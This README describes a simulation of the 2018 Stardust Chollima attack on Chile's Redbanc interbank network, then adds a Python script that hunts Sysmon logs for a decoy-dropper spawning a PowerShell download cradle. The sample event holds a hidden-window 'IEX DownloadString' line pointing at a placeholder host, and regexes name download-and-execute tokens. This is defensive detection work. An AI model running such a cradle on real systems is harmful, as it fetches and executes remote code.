Stardust Chollima APT Adversary Simulation
This is a simulation of an attack by the Stardust Chollima APT group targeting the Chilean interbank network (Redbanc). The campaign was active in December 2018 and used PowerRatankba, a PowerShell-based malware variant that closely resembles the original Ratankba implant. The Redbanc corporate network was infected with a version of PowerRatankba that was not detected by anti-malware. According to Flashpoint, the attackers delivered the malware after a trusted Redbanc IT professional clicked to apply to a job opening found on social media (LinkedIn). I relied on Security Affairs to figure out the details to make this: https://securityaffairs.com/79929/breaking-news/chilean-research-redbank-lazarus.html
Stardust Chollima Operations performed: https://apt.etda.or.th/cgi-bin/showcard.cgi?g=Subgroup%3A%20Bluenoroff%2C%20APT%2038%2C%20Stardust%20Chollima&n=1
The dropper used to deliver the malware is related to PowerRatankba: a Microsoft Visual C#/Basic .NET compiled executable associated with the Stardust Chollima APT. The dropper was used to download the PowerRatankba PowerShell reconnaissance tool; it displays a fake job application form while it downloads and executes …
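The delivery chain above (a user-launched decoy executable that spawns PowerShell with a download-and-execute cradle) is what a defender would want to hunt for. The following Python script is an added example for this write-up, not part of the simulation repo or of the PowerRatankba tooling: it scores constructed Sysmon Event ID 1 (process creation) records in JSON-lines form and flags a PowerShell child whose parent lives in a user-writable path and whose command line carries hidden-window flags plus a download cradle. The sample events, file paths, the `example.invalid` URL, the regex heuristics and the alert threshold are all assumptions made for the example; the field names (`Image`, `ParentImage`, `CommandLine`) are Sysmon's own.

```python
"""Hunt constructed Sysmon process-creation events for a decoy-dropper ->
PowerShell download cradle chain. Added example; heuristics are generic and
are not indicators taken from the Redbanc incident."""
import json
import re

# Tokens of a PowerShell download cradle: a fetch token and an execute token.
CRADLE_PATTERNS = [
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    re.compile(r"invoke-expression|\biex\b", re.I),
]
# Launch flags that hide the window, skip the profile or bypass policy.
STEALTH_FLAGS = re.compile(
    r"-(w(indowstyle)?\s+hidden|nop(rofile)?|ep\s+bypass|executionpolicy\s+bypass|enc(odedcommand)?)\b",
    re.I,
)
# Parent binaries running from user-writable locations (e.g. a downloaded "form" exe).
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\(downloads|appdata|desktop|documents)|temp)\\", re.I)


def score_event(ev):
    """Return (score, reasons) for one Sysmon process-creation event dict.
    Only PowerShell children are scored; everything else scores 0."""
    reasons = []
    image = ev.get("Image", "")
    parent = ev.get("ParentImage", "")
    cmd = ev.get("CommandLine", "")
    if not image.lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return 0, reasons
    if USER_WRITABLE.search(parent):
        reasons.append(f"parent in user-writable path: {parent}")
    if STEALTH_FLAGS.search(cmd):
        reasons.append("hidden-window / no-profile / bypass flags")
    hits = [p for p in CRADLE_PATTERNS if p.search(cmd)]
    if len(hits) == len(CRADLE_PATTERNS):
        reasons.append("download + execute cradle")
    elif hits:
        reasons.append("download or execute token")
    return len(reasons), reasons


def hunt(lines, threshold=2):
    """Parse JSON-lines Sysmon events and return alerts at or above threshold."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({
                "pid": ev.get("ProcessId"),
                "parent": ev.get("ParentImage"),
                "score": score,
                "reasons": reasons,
            })
    return alerts


# Constructed sample events (assumption: one JSON object per line, Sysmon field names).
# Event 1 models the decoy-form dropper spawning a hidden PowerShell cradle;
# events 2 and 3 are benign admin and user activity.
SAMPLE_EVENTS = r"""
{"EventID":1,"ProcessId":4120,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Users\\jdoe\\Downloads\\ApplicationForm.exe","CommandLine":"powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/r.ps1')\"","User":"CORP\\jdoe"}
{"EventID":1,"ProcessId":5000,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\svchost.exe","CommandLine":"powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\inventory.ps1","User":"NT AUTHORITY\\SYSTEM"}
{"EventID":1,"ProcessId":5100,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe","User":"CORP\\jdoe"}
"""

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

Only the first sample event trips the threshold (user-writable parent, stealth flags and a full fetch-plus-execute cradle); the scheduled admin script and the notepad launch score zero. In a real deployment the same scoring runs over exported Sysmon or PowerShell 4104 script-block logs, and the threshold is tuned against the environment's legitimate PowerShell usage.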